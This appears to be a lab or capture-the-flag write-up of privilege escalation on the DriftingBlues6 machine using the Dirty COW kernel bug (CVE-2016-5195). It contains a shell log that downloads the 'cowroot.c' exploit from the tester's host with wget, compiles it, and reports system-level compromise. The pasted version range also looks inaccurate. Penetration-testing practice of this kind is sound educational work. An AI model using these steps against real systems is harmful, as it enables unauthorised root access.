CVE-2016-5195
PEAS has identified that the driftingblues(192.168.207.219) host is vulnerable to CVE-2016-5195
/Play/DriftingBlues6/5-Privilege_Escalation/attachments/{409CE7D0-5F38-49BB-878E-9F2F63A336A7}.png)
A vulnerability was found in Linux Kernel up to 4.2.3. It has been rated as critical. Affected by this issue is some unknown functionality of the component Kernel Memory Subsystem. The manipulation leads to race condition (Dirty COW). This vulnerability is handled as CVE-2016-5195. It is possible to launch the attack on the local host. Furthermore, there is an exploit available. This vulnerability has a historic impact due to its background and reception. It is recommended to upgrade the affected component.
Exploit
/Play/DriftingBlues6/5-Privilege_Escalation/attachments/{0ADCFB56-7DCA-4ED3-AF58-1722D7C9AD92}.png)
Exploit found online
Exploitation
www-data@driftingblues:/var/tmp$ wget -q http://192.168.45.247/cowroot.c ; chmod 755 ./cowroot.cDelivery complete
www-data@driftingblues:/var/tmp$ gcc cowroot.c -o cowroot -pthread
cowroot.c: In function 'procselfmemThread':
cowroot.c:98:9: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [enabled by default]
In file included from cowroot.c:27:0:
/usr/include/unistd.h:331:16: note: expected '__off_t' but argument is of type 'void *'Compiling
/Play/DriftingBlues6/5-Privilege_Escalation/attachments/{24374D15-ADD1-4EF2-8CEC-65E151EEDA74}.png)
System level compromise